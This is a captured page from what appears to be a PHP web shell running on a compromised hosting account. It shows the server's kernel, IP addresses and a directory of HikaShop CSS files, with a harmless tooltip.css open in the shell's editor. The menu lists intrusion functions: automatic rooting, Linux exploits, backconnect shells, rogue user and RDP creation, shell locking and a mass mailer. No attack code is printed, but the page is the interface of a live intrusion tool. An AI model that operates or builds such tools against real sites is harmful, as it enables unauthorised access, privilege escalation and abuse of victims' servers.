Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.120.20.2 | : 216.73.216.49
Cant Read [ /etc/named.conf ]
8.5.7
verseaumee
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
verseaumee /
zenit /
media /
com_hikashop /
css /
[ HOME SHELL ]
Name
Size
Permission
Action
backend_default.css
150.65
KB
-rw-r--r--
dropdown.css
3.18
KB
-rw-r--r--
font-awesome.css
45.88
KB
-rw-r--r--
frontend_default.css
55.43
KB
-rw-r--r--
frontend_old.css
58.68
KB
-rw-r--r--
hikashop.css
45.75
KB
-rw-r--r--
index.html
28
B
-rw-r--r--
notify-metro.css
1.2
KB
-rw-r--r--
nouislider.min.css
4.11
KB
-rw-r--r--
opload.css
7.45
KB
-rw-r--r--
otree.css
2.81
KB
-rw-r--r--
owl.carousel.min.css
3.01
KB
-rw-r--r--
owl.theme.default.min.css
1.06
KB
-rw-r--r--
owl.theme.green.min.css
1.06
KB
-rw-r--r--
rtl.css
7.35
KB
-rw-r--r--
safari_hikashop.css
9.97
KB
-rw-r--r--
style_default.css
85.26
KB
-rw-r--r--
tooltip.css
1.86
KB
-rw-r--r--
vex.css
30.62
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : tooltip.css
/** * @package HikaShop for Joomla! * @version 4.5.1 * @author hikashop.com * @copyright (C) 2010-2022 HIKARI SOFTWARE. All rights reserved. * @license GNU/GPLv3 http://www.gnu.org/licenses/gpl-3.0.html */ .hk-tooltip { position: absolute; z-index: 1050; display: block; font-size: 11px; line-height: 1.4; opacity: 0; filter: alpha(opacity=0); visibility: visible; } .hk-tooltip.in { opacity: 0.8; filter: alpha(opacity=80); } .hk-tooltip.top { padding: 5px 0; margin-top: -3px; } .hk-tooltip.right { padding: 0 5px; margin-left: 3px; } .hk-tooltip.bottom { padding: 5px 0; margin-top: 3px; } .hk-tooltip.left { padding: 0 5px; margin-left: -3px; } .hk-tooltip-inner { max-width: 200px; padding: 8px; color: #ffffff; text-align: left; text-decoration: none; background-color: #000000; -webkit-border-radius: 4px; -moz-border-radius: 4px; border-radius: 4px; } .hk-tooltip-arrow { position: absolute; width: 0; height: 0; border-color: transparent; border-style: solid; } .hk-tooltip.top .hk-tooltip-arrow { bottom: 0; left: 50%; margin-left: -5px; border-top-color: #000000; border-width: 5px 5px 0; } .hk-tooltip.right .hk-tooltip-arrow { top: 50%; left: 0; margin-top: -5px; border-right-color: #000000; border-width: 5px 5px 5px 0; } .hk-tooltip.left .hk-tooltip-arrow { top: 50%; right: 0; margin-top: -5px; border-left-color: #000000; border-width: 5px 0 5px 5px; } .hk-tooltip.bottom .hk-tooltip-arrow { top: 0; left: 50%; margin-left: -5px; border-bottom-color: #000000; border-width: 0 5px 5px; } .hkfade { opacity: 0; -webkit-transition: opacity .15s linear; -moz-transition: opacity .15s linear; -o-transition: opacity .15s linear; transition: opacity .15s linear; } .hkfade.in { opacity: 1; }
Close